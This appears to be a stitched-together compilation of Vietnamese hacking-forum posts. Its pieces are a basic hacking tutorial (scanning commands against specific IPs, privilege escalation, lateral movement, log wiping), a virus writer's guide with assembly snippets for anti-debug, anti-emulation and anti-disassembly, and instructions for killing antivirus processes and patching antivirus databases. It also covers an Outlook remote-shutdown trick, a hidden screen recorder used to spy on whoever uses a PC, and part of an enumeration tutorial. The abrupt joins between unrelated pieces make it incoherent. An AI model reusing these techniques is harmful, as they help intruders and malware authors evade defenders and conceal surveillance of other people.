logout. Ví dụ này tôi đưa ra với mục đích giúp các bạn hiểu 1 trong các bước cơ bản đầu tiên trong quá trình hacking. Hy vọng các bạn khi thử thành công không nên làm ảnh hưởng đến dữ liệu của người khác.

b. Thu thập thông tin về mục tiêu - Scanning, Enumeration
Bước này thật ra tương tự bước đầu tiên (Footprinting) nhưng ở mức độ chi tiết và nâng cao hơn.
- Tìm hiểu các dịch vụ (services) được dùng trên hệ thống đối phương, dò/quét các cổng (port) để tìm kiếm cổng hở, xác định dịch vụ dùng cho cổng này.
Một số công cụ thừơng được dùng như:
Nmap (www.insecure.org/nmap)
Netcat
Strobe (packetstorm.security.com)
ISS (www.iss.net)
Các trình duyệt cổng hở và các tài nguyên chia xẻ (share) khác dùng cho Windows như Superscan, Sechole, Redbutton, Net Essential...

Quá trình duyệt cổng có thể cho ta biết được các dịch vụ web nào được sử dụng ở mục tiêu. Ví dụ như các cổng TCP: 139, 135 (NETBIOS), 110 (pop3), 80 (HTTP), 79 (Finger), 53 (domain), 25 (smtp), 21 (ftp)...Thậm chí cả hệ điều hành và webserver đựơc sử dụng ở mục tiêu.
Ví dụ với netcat, ta dùng lệnh sau: nc -v -z 203.162.1.1 1-255
Với nmap, ta dùng: nmap -sS 203.162.1.1/255 hay nmap -p80 -O 203.162.1.10
Các bạn tự tìm hiểu cách sử dụng các tool khác. Lưu ý các câu lệnh ví dụ ở đây chỉ mang tính chất tham khảo.

- Tìm hiểu các lỗi/lổ hổng bảo mật mà mục tiêu có thể mắc phải. Ta có thể tìm thông tin từ các website sau:
www.securityfocus.com
www.l0pht.com
www.microsoft.com/security
packetstorm.security.com
Hoặc có thể đăng ký ở các mailing list để có thể nhận được các thông tin về security cập nhập nhất:
Buqtraq (www.securityfocus.com)
NTBugTraq (www.ntbugtraq.com)
Pen-Test (www.securityfocus.com)

c. Tiến hành tấn công
- Khai thác điểm yếu của hệ thống, hệ điều hành
. Thử tìm cách truy xuất đến các dịch vụ của hệ thống dựa trên hoặc có liên quan đến các lỗi bảo mật
. Tìm hiểu các thông tin về lỗi bảo mật từ các nhà sản xuất hệ thống, tìm hiểu các thông tin patch/update tương ứng với version bạn đang nghiên cứu
- Khai thác điểm yếu của các ứng dụng dùng trên máy chủ - server
. Một số ứng dụng server có thể có lỗi như Microsoft IIS, Netscape Enterprise Server, Oracle, Apache...
- Khai thác điểm yếu của các ứng dụng client
. Tìm hiểu các lỗi về /cgi-bin, các lỗi về tràn bộ đệm
. Tìm hiểu các lỗi về javascript
. Tìm hiểu các lỗi về cookies
. Tìm hiểu các thiết lập mặc định của các ứng dụng web, vd như mật khẩu admin ngầm định của một số Forum...
- Leo thang đặc quyền (Escalate Privileges), tôi chỉ mô tả một số cách có thể đạt được mục đích
. Theo dõi trên mạng (sniff) để tìm cách lấy các thông tin bảo mật của người dùng, vd như dùng các công cụ bắt gói tin (packet sniffer) để bắt các thông tin liên quan đến mật khẩu di chuyển trên mạng...
. Tìm cách lấy các SUID từ các chương trình quản lý nhưng khả năng kiểm tra các giá trị nhập vào hoặc các giá trị biên kém.
. Tìm hiểu các user (user ID) ko có mật khẩu, mật khẩu rỗng, hoặc các mật khẩu ngầm định
. Tìm kiếm các thông tin về mật khẩu trong các file trên hệ thống, dùng các công cụ crack pass nếu các file password đựơc mã hoá
. Tìm hiểu kĩ mối quan hệ giữa các máy trong hệ thống muốn thâm nhập, dò các sơ hở và tìm cách khai thác lan rộng ra khắp hệ thống.
Như vậy, leo thang đặc quyền là tìm cách nâng cao quyền hạn của mình trong hệ thống. Vi dụ từ user Guest hay Khôngrmal user trong hệ thống, hacker có thể tìm hiểu các sơ hở để từ đó bổ sung thêm quyền hạn cho mình, thậm chí đoạt quyền admin. Một ví dụ điển hình của leo thang đặc quyền trong quá trình khai thác lỗi của Hosting Controller, khi upload 1 exploit script lên 1 Khôngrmal host, nếu sau đó ta tìm cách chuyển script đó vào thư mục admin của HC thì khi run nó sẽ có quyền admin.
- Mở rộng khai thác ra các hệ thống lân cận; xác định các mục tiêu kế tiếp bắt nguồn hoặc có liên quan đến mục tiêu ban đầu
. Dùng netstat -na để tìm hiểu các connection đến các máy khác
. Thử khả năng từ một máy trong mạng, kết nối đến máy khác có trust-relationship, nếu may mắn thì có thể thâm nhập được mà ko phải qua các quá trình kiểm tra gắt gao
. Tìm hiểu các file có trên hệ thống, chẳng hạn như các file trong *nix /etc/hosts, ssh/identity.pub ...
- Các bước khác tùy khả năng của bạn.

d. Xóa dấu vết (xóa log files..), tệ hơn có thể là phá hủy thông tin của hệ thống

3- Các mục tiêu và phương pháp hay dùng hiện nay
a. Các mục tiêu thuờng bị tấn công
- Unix và các biến thể từ nó: Linux, FreeBSD, Solaris, SCO..
- Các hệ thống Windows NT, 2k, XP, 9x...
- Các dịch vụ và máy chủ WWW
- Các ứng dụng web, Forum...
- Trộm mật khẩu của các dịch vụ web như các web e-mail, instant Hộp thư ...

b. Các kiểu tấn công thông dụng
- Tấn công làm ngập đường truyền mạng (flood), tấn công từ chối dịch vụ (Distributed Denial of Service)
- Tấn công dạng local - cục bộ
- Tấn công remote - từ xa
- Tấn công dạng điều khiển dữ liệu - data driven

Bây giờ tôi sẽ phân tích chi tiết hơn về các kiểu tấn công ở trên.

b.1 Tấn công từ chối dịch vụ (DoS)
- Feature driven
SYN flooding
- Inappropriate configurations
SMURF
- Programming flaws
Teardrop
- Distributed DoS: DoS tập thể 1 mục tiêu từ nhiều hướng, nhiều máy ....(Sẽ biên soạn và bổ sung sau)

b.2 Tấn công dạng local - host based
- Khai thác các lỗi tràn bộ đệm
Cách hạn chế: Quản lý tốt bộ nhớ, stack; cập nhật các bản sửa lỗi; lập trình kĩ càng và tốt hơn.
- Khai thác các điểm yếu trong việc kiểm tra điều kiện thực thi của các ứng dụng
Cách hạn chế: Lập trình kĩ và tốt hơn
- Dùng trojan, backdoor, virus...
Cách hạn chế: Kiểm tra kĩ càng các chương trình lạ trứơc khi thực hiện, sử dụng các trình diệt virus thông dụng và thường xuyên cập nhật
- Crack password
Cách hạn chế: Dùng các kĩ thuật mã hóa cao hơn, hạn chế số lần thử mật khẩu ở các login form
- Đăng nhập vào hệ thống kiểu vật lý bằng cách khởi động từ đĩa mềm hoặc một hệ điều hành song song khác
Cách hạn chế: Tăng cường các biện pháp bảo vệ các thiết bị

b.3 Tấn công dạng remote - network based
- Khai thác các lỗi tràn bộ đệm
Cách hạn chế: Tương tự như ở local
- Tấn công nhiễm độc tên miền (DNS Cache poisoning)
Cách hạn chế: Dùng cache timeout, DNSSEC, Khôngn-Caching Servers
- Tấn công vào lỗi/lổ hổng của website.
Cách hạn chế: Cập nhật các bản sửa lỗi mới nhất, thiết lập cấu hình chính xác, điều chỉnh các quyền hạn, thiết kế và viết mã website tốt.
- Khai thác các tên đăng nhập, mật khẩu yếu; tức là các mật khẩu ngầm định, quá ngắn, dễ đoán; hoặc các dạng đăng nhập có cơ chế kiểm tra sơ hở, ko kiểm tra số lần thử password...làm dễ crack bằng dictionary, bruteforce...
Cách hạn chế: Tăng cường kiểm tra số lần thử password (vd sẽ ko cho tiếp tục đăng nhập nếu số lần nhập sai password quá 5 lần..), giới hạn chiều dài password tối thiểu, tăng cường mã hóa bằng các giải thuật tốt...
- Khai thác từ các thông tin chia sẻ (sharing) như SMB/NetBIOS, NFS
Cách hạn chế: giới giạn quyền hoặc tắt share, nâng cấp hệ thống file có khả năng bảo mật cao hơn như NTFS, HPFS...

b.4 Tấn công dạng điều khiển dữ liệu - data driven
- Khai thác sơ hở của các đối tượng dữ liệu dùng phía server, các mã Java, Javascript, VBScript, Perl, PHP..., các ActiveX control.
- Dùng cửa sau (backdoor), trojan, virus
Vài thông tin về các backdoor:
Unix:
sshd
Windows: BackOffice 2k, DeepThroat (cổng UDP 2140, 3150), NetSphere (TCP 30100, 30102), GateCrasher (TCP 6969), GirlFriend (TCP 21554), Hack'a'Tack (TCP 31785; UDP 31789, 31791), EvilFTP (TCP 23456), SubSeven (TCP 1234)
- Khai thác sơ hở từ các cổng dịch vụ, các giao thức cấu hình sai hoặc có cơ chế bảo mật yếu.
Cách hạn chế chung dạng này: Cập nhật các bản sửa lỗi, fix lỗi; thiết lập cấu hình chính xác; dùng tường lửa (firewall, proxy), các trình antivirus.

II. PHÍA NHỮNG NHÀ QUẢN TRỊ HỆ THỐNG
Chúng ta sẽ đề cập đến một số phương pháp có thể giúp ích cho những nhà quản trị trong việc hạn chế và ngăn chặn sự tấn công của hacker
1- Thiết kế tốt hệ thống - Design
Một trong những nguyên nhân chủ yếu giúp hacker thành công trong việc hack vào các hệ thống là do bản thân sự yếu kém trong việc thiết kế hệ thống của những nhà quản trị. Một hệ thống được gọi là tốt phải là một sự phối hợp đồng nhất và hiệu quả của các thiết bị phần cứng (đường truyền mạng, router, server...) và phần mềm (OS, software...). Phần cứng phải được lựa chọn phù hợp; bố trí, cài đặt hợp lý và được bảo vệ cẩn thận. Phần mềm cài đặt và thiết cấu hình chính xác, cập nhật thường xuyên các bản sửa lỗi. Một điều quan trọng là chúng phải đựơc quản lý bởi người có kiến thức và kinh nghiệm.
Một số vấn đề ta cần quan tâm ở đây:
- Tường lửa
- Phân chia, bố trị mạng
- Kiểm tra thường xuyên các nỗ lực thâm nhập

2- Kiểm tra kĩ lưỡng hệ thống - Quality Assurance

3- Theo dõi các hành vi tấn công - Intrusion Detection

4- Các chính sách bảo mật và kết luận chung - Security Policies
Tôi sẽ đưa thêm một số ví dụ về từng kỹ thuật đã đề cập phía trên

Anti-Debug
Về bản chất chống thao tác debug tức là dạy VR chống lại con người (ở đây là các AV), chính vì vậy điều này xem ra không thể thực hiện được. Sau khi bắt được một mẫu VR mà không de-assemble được, các AV sẽ sử dụng các công cụ debug dịch ngược VR từ mã máy ra dạng ASM để đọc và tìm hiểu nguyên lý hoạt động của VR đặc biệt là đoạn code mã hoá vì đây là điểm quan trọng nhất để giải mã và hiểu được nội dung VR. Thông thường đề làm được các VXer phải mã hoá VR dựa trên một số thuật toán mã hoá thật phức tạp nhằm làm nản lòng người đọc. Các giải thuật này có rất nhiều trên NET nên tôi sẽ không trình bày nữa. Khi lập trình người lập nên tận dụng các lệnh nhảy và call càng nhiều càng tốt nhằm gây khó khăn cho người theo dõi.

- Gọi luôn API của debugger
VD:
call IsDebuggerPresent ;call API
xchg eax, ecx ;result to ECX
jecxz debugger_not_present ;if ZERO, debugger not present
Gọi hàm API Win98/NT kiểm tra API level debugger

- Kiểm tra debugger context
mov ecx, fs:[20h] ;load context of debugger
jecxz debugger_not_present ;if ZERO, debugger not present
- Sử dụng SEH
call setupSEH ; The call pushes the offset
errorhandler:
mov esp,[esp+8] ; Put the original SEH offset
; Error gives us old ESP
; in [ESP+8]
;*** SECRET CODE HERE ***
setupSEH:
push dword ptr fs:[0] ; Push original SEH handler
mov fs:[0],esp ; And put the new one (located
; after the first call)

mov ebx,0BFF70000h ; Try to write in kernel (will
mov eax,012345678h ; generate an exception)
xchg eax,[ebx]

- Gọi VxD service (Ring-0 only)
mov eax, 202h ;SoftICE ID number
VxDCall Get_DDB ;call service
xchg eax, ecx ;result to ECX
jecxz sice_not_present ;SoftICE not present

- Kiểm tra softice trên bộ nhớ bằng CreateFileA
xor eax, eax ;EAX=0
push eax ;parameters
push 4000000h ;for
push eax ;CreateFileA
push eax ;API
push eax ;function
push eax ;...
push offset sice ;name of driver
call CreateFileA ;open driver
inc eax ;is EAX==0?
je sice_not_present ;yeah, SoftICE is not present
dec eax ;no,
push eax ;close its handle
call CloseHandle ;...
... ;and make some action
sice db '\\.\SICE',0 ;SICE driver under Win9X
;sice db '\\.\NTICE',0 ;SICE driver under WinNT
- Chọc vào các thanh ghi debug (Ring-0 only)
mov eax, '****' ;set already_infected mark
mov dr0, eax ;to dr0

Anti-Heuristics bằng bẫy ngắt trên DOS:

INT 1: Ngắt 01 có một số đặc điểm lạ có thể lợi dụng. Thông thường ta có thể gọi ngắt qua opcode CDh. Ở đây là 0CDh/001h tuy nhiên lệnh gọi ngắt 01 có một mã khác là 0F1h. Mã không công bố cũng đồng nghĩa với việc có thể không được emulated bởi các AVs. Lợi dụng điều này ta có thể dùng INT 01h để mã hoá VR:

mov ax, 3501h ;Lấy ngắt 01 cũ
int 21h
mov old_segm, es
mov old_offs, bx

mov ax, 2501h ; Bẫy int 01
mov dx, offset int1_handler ;Giả định DS=CS
int 21h

db 0F1h ; Giải mã VR

mov ax, 2501h ;Phục hồi ngắt cũ
mov dx, cs:old_offs
mov ds, cs:old_segm
int 21h


[...]

int1_handler:
;...Giải mã/ mã hoá VR here...
iret

Hoặc ta có thể làm mất vết bằng cách:
[...]

db 0F1h ;Gọi int 01 đã bẫy (như trên)
mov ax, 4c00h ;quit program
int 21h ;Thực ra chẳng bao giờ quit

;---- VR tiếp tục bình thường

[...]

int1_handler:
mov bx, sp ;modify return address, so the quit command
add word ptr ss:[bx], 5 ;is never executed.
iret

INT 06: Điểm mạnh của INT 06 là được CPU gọi khi có thao tác bất thường. Các AVs rất khó bẫy. Tương tự trên ta ó thể sử dụng int 06h

mov ax, 3506h ;Lấy ngắt cũ
int 21h
mov old_segm, es
mov old_offs, bx

mov ax, 2506h ;Bẫy ngắt
mov dx, offset int6_handler
int 21h

dw 0FFFFh ;Tự tạo lỗi

mov ax, 2506h ;trả ngắt cũ
mov dx, cs:old_offs
mov ds, cs:old_segm
int 21h

[...]

int6_handler:
;mã hoã/giải mã ở đây
mov bx, sp
add word ptr ss:[bx], 2 ;Trở về VR cũ
;2 là mã lệnh không hợp lệ
iret

Hoặc cũng có thể dùng làm kỹ thuật xoá vết như trên
Các newbie xem cũng được nhưng bài này không dành cho newbie. Đây không phải khái niêm cơ bản, tôi chỉ muốn tổng kết một số kỹ thuật bảo vệ trong môn virus programming

Một chương trình diệt VR (AV) tốt là một AV tìm được nhiều VR. Một VR mạnh là một VR được bảo vệ. Được bảo vệ có nghĩa là VR có các tính năng chống phát hiện, chống emulate, chống disassemble, khó theo dõi hành vi. Ở đây tôi xin đề cập đến một vài kỹ thuật bảo vệ như vậy đã từng được các V-er áp dụng trong virus programming.
Có nhiều cách lắm và rất đa dạng như bất cứ kỹ thuật nào cần đến sức sáng tạo của con người. Trong phần này tôi sẽ đề cập tới các kỹ thuật chính:
- anti-emulator
- anti-heuristics
- anti-analysis (anti-disasm)
- anti-debug
- anti-monitor
- anti-antivirus (retro)
- anti-bait
Đây là giới thiệu chung nên tôi không đưa hết các code ví dụ. Có thể tôi sẽ phân tích và đưa ra code ví dụ sâu hơn ở từng kỹ thuật nếu thấy có nhiều bạn đọc quan tâm. Nếu bạn nào muốn thảo luận sâu hơn về kỹ thuật nào xin liên hệ trực tiếp.

Anti-Emulator bằng các tip-trick đơn giản:
Với phương pháp heuristic analysis các AV sẽ CÓ THỂ phát hiện ra mọi VR, kể cả các VR chưa từng gặp. Nó làm việc giống như một bộ giải mã, quét và kiểm tra các đoạn code khả nghi kiểu như các đoạn duyệt APIs, jump to ring-0, làm việc với *.exe mở và ghi các tệp khả thi (.exe, .dll...). Heuristic analysis là một í tưởng rất táo bạo tuy nhiên nghe có vẻ ... phi thực tế. Thế nhưng kỹ thuật này cho đến nay đã có rất nhiều cải tiến và phát triển trong hầu hết các AV nổi tiếng. Tuy vậy, nhiều AV có các bugs và nhiều khi không nhận các đoạn code nguy hiểm. Một số gặp khó khăn khi bắt gặp các mã lệnh "hiểm" (undocumented opcodes) và đa số chúng đều không thể quản lý stack chính các như khi VR chạy thực. Lợi dụng các đặc điểm này nảy sinh một số tricks để qua mặt các Emulator như:
- Kiểm tra stack:
mov edx, esp
push cs
pop eax
cmp esp, edx
jne emul_present ; Có AV emulator
Đoạn code trên hoàn toàn vô hại thậm chí hơi ngớ ngẩn nếu bạn xem qua nhưng trong thực tế chương trình của ban phát hiện được ngay có kẻ can thiệp vào stack của ban trong khi chạy, vậy chương trình của bạn không chạy thực mà chỉ đang trong chế độ emulator
- Tương tự thế bạn có thể lừa AV bằng vài lệnh RETF (rất nhiều VR nội có dùng)
- Sử dụng các opcode lạ (undocumented opcodes) của processor như SALC, BPICE. Vô hại với bạn nhưng khó hiểu với AV
......

Anti-Heuristics bằng kỹ thuật cao cấp:
Như vậy anti-emulator là đánh vào chỗ hổng của các giải thuật heuristic scanners. Các AV có thể khắc phục nhưng rất khó khăn đặc biệt nếu bạn dùng vài kỹ thuật cao hơn như SEH. Tạo ra lỗi giả rồi nhảy đến đoạn bẫy lỗi. Tôi viết VR cách đây lâu rồi nên các kỹ thuậu mới trên win có khi không cập nhật bằng các bác nữa. Tôi sẽ đi sâu vào DOS hơn một chút.
Trước kia trên DOS tôi thích sử dụng vài kỹ thuật bẫy ngắt với:
- Int 0 (divide by zero). Chỉ cần một phép chia cho 0, bạn sẽ nhảy ngay đến code mới mà emulator không theo vết được (ta có thể âm thầm descrypt ở đây)
- Dấu code gọi ngắt:
mov ax, 3D02h-key
add ax, key
int 21h ;Tránh để lộ thao tác đọc file
- Với 386/486 ngày xưa có thể cùng queue fetch (xin lỗi vì tôi hơi hoài cổ một chút):
mov word ptr cs:[offset piq], 20CDh
piq:
nop
nop
code này ngày nay không dùng được. Bạn sẽ nghĩ chương trình sẽ kết thúc vì lệnh int 20h (20CDh) ư? Không đâu! với 386/486 code chạy vẫn là nop
Thế nhưng ngày nay kỹ thuật này biến thể một chút vì các CPU pentium không có queue fetch nhưng các emulator phát triển từ xưa vẫn nghĩ là có. Kỹ thuật đảo lại là:
mov word ptr [offset prefetch], <mã lệnh jump>
prefetch:
int 20h
(sao bạn không cười? tôi có trình khó hiểu quá không nhỉ? )
- Tương tự ngắt int 0. Bạn có thể bẫy int 1, int 6
Thôi kết thúc DOS. Trở lại win ta có thể dùng:
- Structured Exception Handling (SEH). Kỹ thuật này phổ biến quá rồi ha
- Threads and fibers
- Pentium+, copro, MMX, 3DNow! opcodes (undocumented opcodes)
- Kỹ thuật đa hình metamorphism
- Nhảy bằng Callbacks
- .......
Chắc mọi người biết cả rồi vì tôi mới trở lại với "Nghệ thuật hắc ám" gần nên kiến thức trên win không mới lắm.

Anti-Analysis
Ở phần này tôi muốn nói về chống disassemblers. Ai cũng biết mấy thằng disassemblers thông dụng như IDA, Sourcer hay win32dasm. Nếu bạn là người xây dựng chương trình disassemblers bạn sẽ làm thể nào. Tất nhiên dễ nhất là bắt đầu từ đầu chương trình, dasm tuần tự. Nếu code tuần tự như tiến ta có kết quả đẹp nhất. Nếu không sau lần chạy thứ nhất ta sẽ hiệu chỉnh lại code theo các lệnh nhảy và call... Thử chạy sourcer, bạn sẽ thấy điểm yếu nhất của disassemblers là rất, rất khó xử lý lệnh call và jump. Vậy phương pháp của V-er là:
- Mã hoá càng nhiều càng tốt
- Sử dụng call với relative offset kiểu
call label
gdelta: db 0b8h ;MOV opcode
label: pop ebp
...
mov eax, [ebp + variable - gdelta]
(Cách này có ở đa số VR rồi)
- Nhảy vào ... giữa mã lệnh:
jmp opcd+1 ;jump into instruction
opcd: mov eax, 0fcebfa90h
Bạn có thể thấy ngay thực ra đây không phải lệnh mov mà lệnh ta là 0fcebfa90h cơ
- Chèn các mã kiểu (db 0b8h) vào nhiều nơi sau các lệnh ret, jmp, ...
- Patch code runtime (tương tự kiểu queue fetch ở trên
- ...

Anti-Debug
Các AVer đã tóm được một mẫu VR của bạn. Hix.. bây giờ thì quá khó. Tuy vậy ta cũng có thể chống đỡ trong ... tuyệt vọng. Với Anti-Debug, nếu AVer không cao thủ họ mới nghi ngờ thôi thì cũng có thể bỏ cuộc. Vả lại có chết cũng cho oanh liệt, gây khó khăn chứ. Nếu không disassemble được người diệt sẽ debug. Cách thông thường là tìm xem có phần mềm debugger thông dụng kiểu softice thì chuồn lẹ. Các cách nhận biết debugger có thể là:
- Gọi luôn API của debugger
- Kiểm tra debugger context
- Sử dụng SEH (xem trên)
- Gọi VxD service (Ring-0 only)
- Kiểm tra softice trên bộ nhớ bằng CreateFileA
- Chọc vào các thanh ghi debug (Ring-0 only)

Anti-Monitor
Cũng vậy thôi, ta tìm xem có thằng AV nào thông dụng đang chạy trên bộ nhớ thì chuồn. Có thể dùng hàm API FindWindowA mà tìm. Nếu thấy thịt nó luôn bằng cách sử PostMessageA đến window handle của nó

Anti-Antivirus
Chủ động tìm database của AV trên đĩa mà thịt (có thể AV sẽ không chạy được nữa). Hay nhất là patch được database (AV chạy bình thường nhưng không tìm được VR nữa. Một số db thông dụng:
*.AVC - AVP viral database
AVP.CRC - AVP crc file
*.VDB - DrWeb viral database
NOD32.000 - NODICE viral database
ANTI-VIR.DAT - TBAV crc file
CHKLIST.MS - MSAV crc file

Anti-Bait
Chọn file mà lây. Tránh các AV, tránh mấy chương trình thông dụng kiểu winword.exe. Như ngày xưa trên DOS ta hay tránh command.com í

Tóm lại, tôi tổng kết các kỹ thuật ở đây, đây là theo những gì tôi hiểu nên sai các bác bỏ qua cho. Nếu tôi trình bày khó hiểu quá thì hix... trình độ sư phạm tôi thế thôi. Đây toàn là í tưởng các Ver chuyên nghiệp đã dùng nếu bạn là Ver đã từng viết VR chắc sẽ hiểu ra và tự xây dựng đoạn code cho riêng mình được.


Nếu vội phải đi mà quên chưa tắt máy, bạn có thể dùng ĐTDĐ để làm việc này. Yêu cầu đối với máy tính là dùng chương trình MS Outlook để gửi và nhận e-mail.
Cài đặt trong Outlook. Ảnh: Thế giới @

Trước hết, bạn thiết lập chế độ tự động kiểm tra e-mail sau một khoảng thời gian nhất định trong Outlook bằng cách chọn công cụ Tools > Options > chọn thẻ Mail Setup > Send/Receive rồi nhập số phút vào ô Schedule an automatic send/receive every ... minutes.

Đối với điện thoại, bạn phải cài dịch vụ gửi e-mail, kết nối với Internet. Dịch vụ này có thể là http://www.geocities.com/tomgrek/, hỗ trợ mạng Mobifone, Vinaphone và Viettel.

"Nguyên lý hoạt động" của thủ thuật này là bạn sẽ thiết lập trong Outlook quy tắc sau: Khi nhận được e-mail có dòng tiêu đề SHUTDOWN, máy tính sẽ thực thi một file có đuôi .bat "ra lệnh" tắt máy tính. Như vậy, mỗi khi muốn tắt máy tính từ xa, bạn chỉ cần gửi e-mail từ ĐTDĐ đến hòm thư của mình với dòng tiêu đề như trên.

Các bước tiến hành

- Trong MS Outlook, vào Tools > Rules Wizard > New. Trong hộp thoại Rules Wizard, chọn "Start from a blank rule" rồi chọn "Check message when they arrive", nhấn Next.

- Đánh dấu ô "With specific words in the subject" rồi rê chuột xuống khung "Rule description" bên dưới, nhấn vào liên kết "specific words" rồi nhập vào từ sẽ dùng là tiêu đề ra lệnh tắt máy tính ở khung "Specify words or phrases to search for in the subject", nhấn Add (chú ý nhớ viết hoaa chữ SHUTDOWN).

- Sau khi nhấn OK > Next, ở hộp thoại mới, đánh dấu ô "Start application" trong khung trên và nhấn vào liên kết "application" trong khung dưới để chỉ định file shutdown.bat. (Nhớ chọn Files of type là All files để làm xuất hiện định dạng .bat). Nhấn Finish để hoàn thành.

Cách tạo file shutdown.bat

Mở Notepad, nhập vào dòng

shutdown -f -s

Sau đó nhấn Ctrl_S để lưu lại với cái tên shutdown.bat.

Kiểm tra

Soạn tin nhắn có dạng:

MAIL địa_chỉ_e-mail_của_bạn SHUTDOWN

rồi gửi tới số 997.

Nếu nhận được báo cáo "E-mail tu 997*vol.vnn.vn da duoc gui den..." là thành công.


Chương trình của hãng Fox Magic Software chính là một công cụ lưu giữ hình ảnh về mọi thao tác trên máy tính. Nhờ Mr Captor làm nhà quay phim cho một bài giảng môn Tin học hay làm "thám tử" cho PC... là tùy vào ý bạn.

Trước hết, bạn http://www.snapfiles.com/get/mrcaptor.html để tải bản dùng thử với dung lượng 2,23 MB sau khi giải nén.
Mr Captor chụp màn hình desktop. (Ảnh chụp màn hình)

Điểm nổi bật nhất của chương trình là lưu các hoạt động trên máy tính dưới định dạng video .avi.

Bạn nhấp vào biểu tượng Records a video ở góc dưới cùng trên thanh menu dọc bên trái màn hình. Một con trỏ hình dấu + hiện ra. Bạn kéo rê chuột để chọn vùng lưu hình rồi nhấn đúp chuột. Toàn bộ viền của vùng này được tô bằng màu xanh lá cây nhấp nháy.

Điều đáng chú ý là nếu bạn chọn một vùng nhỏ hơn màn hình thì sẽ thấy biểu tượng video ở bên cạnh để khi kết thúc "cảnh quay", bạn nhấn vào đó lưu file. Còn khi chọn vùng là toàn bộ màn hình thì biểu tượng này không hiện lên. Đây chính là đặc điểm có thể khai thác để Mr Captor làm "thám tử" cho PC của bạn.

Trước hết, bạn vào menu ngang Options > Preferences > Main, đánh dấu vào ô Hide before capture để giấu chương trình trong quá trình quay video. Sau đó vào mục Hotkeys, tìm đến Start/Stop Video Capture để tùy chọn phím nóng bắt đầu/kết thúc việc quay và chú ý ghi nhớ tổ hợp phím này.

Bây giờ, bạn có thể áp dụng phương pháp kiểm soát bằng cách chọn chức năng Records a video (hoặc nhấn tổ hợp phím nói trên), chọn toàn bộ màn hình rồi nhấn đúp chuột. Nếu bạn rời máy để đi có việc, khi ai đó dùng máy tính của bạn, họ sẽ không thể kết thúc chương trình này được vì nó không hiện ra trong Task Manager. Chỉ đến khi bạn về, nhấn tổ hợp phím trên để kết thúc và lưu toàn bộ quá trình thao tác dưới định dạng .avi thì chương trình mới dừng lại.

Nhờ tính năng hiển thị con trỏ trong khi quay video, người sử dụng cũng có thể dùng phần mềm để thực hiện một bài giảng môn vi tính cho học viên.

Ngoài ra, bạn sẽ thấy các chức năng chụp hình đơn giản ở các biểu tượng trên thanh menu dọc.

Khi nhấn vào biểu tượng Captures a region (ô đầu tiên bên menu dọc ở bên tay trái) , bạn sẽ thấy xuất hiện con trỏ hình dấu +. Kéo con trỏ này thành một vùng hình chữ nhật bất kỳ rồi nhấn đúp chuột, bạn sẽ được hình ảnh đó. Biểu tượng tiếp theo Captures a fixed-size region sẽ giúp bạn chụp một khoảng nhất định có kích cỡ không đổi. Khi nhấn chuột vào biểu tượng này, một ô vuông mặc định 32x32 hiện ra. Bạn có thể nhấn chuột phải, chọn Options để tùy ý thay đổi kích cỡ của nó. Ngoài ra, bạn còn lưu được một màu sắc duy nhất ở trên màn hình bằng chức năng Captures a color.

Khi chụp màn hình, có thể bạn chụp rất nhiều và nhanh nên mỗi khi chụp xong mà phải save thì mất khá nhiều thời gian. Do đó, bạn có thể tạo một đường dẫn để máy tự động lưu các hình ảnh này bằng cách vào menu Options > Preferences > Timer Video, chọn đường dẫn trong ô Path.
Kỹ thuật hack cơ bản - Điểm danh - Phần II - 17/2/2004 3h:39


******Enumeration*******
=== Author: Fantomas311 ===
Giả sử việc thực hiện các bước I và II đều không thành công hoặc những thông tin thu được không thể đủ để phát động một cuộc tấn công tức thời nào,hacker sẽ chuyển sang phương pháp định danh các tài khoản người dùng hợp lệ hoặc các tài nguyên dùng chung không được bảo vệ kỹ
Enumeration (điểm danh) là một cách để trích các tài khoản hợp lệ hoặc các tài nguyên từ hệ thống. Ở Part III này, tôi sẽ nêu chi tiết các phương pháp thông dụng nhất, và các công cụ cơ bản của kỹ thuật điểm danh - buớc thứ ba trong basic hacking
Sự khác biệt chính giữa các kỹ thuật thu thập thông tin ở part I ( Foot Printing) và part II ( scanning) và kỹ thuật enumeration dưới đây nằm ở cấp xâm nhập của hacker . Điểm danh liên quan đến các tuyến nối tích cực với các hệ thống và các truy vấn có định hướng.
Phần lớn thông tin thu thập được qua kỹ thuật điểm danh thoạt nhìn có vẻ như vô hại.Tuy nhiên, những thông tin rò rĩ từ lỗ thủng theo sau nó có thể gây tai hại. Nói chung, sau khi điểm danh một tên người dùng hoặc một phần dùng chung hợp lệ, vấn đề còn lại là thời gian trước khi hacker đoán được mật hiệu tương ứng hoặc tìm ra các điểm yếu kết hợp với các giao thức chia sẽ tài nguyên.
Những thông tin mà kỹ thuật điểm danh thu được có thể tạm thu gọn thành các phạm trù sau :
++ Các tài nguyên mạng và các phần dùng chung
++ User và các group
++ Các ứng dụng và biểu ngữ (banner)
Kỹ thuật điểm danh cũng cụ thể theo từng hệ điều hành của server, và do đó ,nó cũng phụ thuộc vào các thông tin thu thập được từ part I và part II . Trong phần này, tôi sẽ lần lươt đề cập đến kỹ thuật điểm danh trong các hệ điều hành : WinNT , Novell và Unix

*******Windows NT********
Tại sao lại là WinNT ?? Đối với kỹ thuật điểm danh thì WinNT có thể xem là một người bạn thân thiết ! Còn tại sao thì.....hạ hồi phân giải nhá !

+++ Điểm danh khu ủy ( domain ) của winNT bằng netview :

Windows là hệ điều hành được thiết kế tạo thuận lợi cho tính năng duyệt các tài nguyên mạng, do đó tiến trình điểm danh các domain NT là cực kỳ đơn giản so với các hệ điều hành khác. Trong hầu hết các trường hợp, chỉ cần dùng các công cụ cài sẵn trong OS ( Operating System ). Lệnh netview là một thí dụ điển hình. Nó sẽ liệt kê các domain sẵn dùng trên mạng, rồi phơi bày thông tin của tất cả các máy tính trong một domain (ta cũng có thể dùng thông tin từ các đợt quét ping trong các phần trước để tìm hiểu các tên domain từ các máy riêng lẻ chỉ việc dùng địa chỉ IP thay cho server name . Sau đây là thí dụ :
Trước hết là điểm dang các domain trên mạng :
C:\> netview /domain
Liệt kê các máy tính trong 1 domain cụ thể :
C:\> netview /domain:têndomain

+++Điểm danh các hệ điều khiển domain NT :

Để đào sâu hơn một chút vào cấu trúc mạng NT , ta cần dùng một công cụ từ NT Resource Kit ( NTRK - lưu ý : từ này dùng khá nhiều trong bài viết này !) , cũng được xem là Windows NT Hacking Kit bởi bản chất dao hai lưỡi của nhiều trình tiện ích điều hành mạnh mà nó cung cấp ! Trước tiên, xin giới thiệu sơ lược về cái gọi là NTRK này :
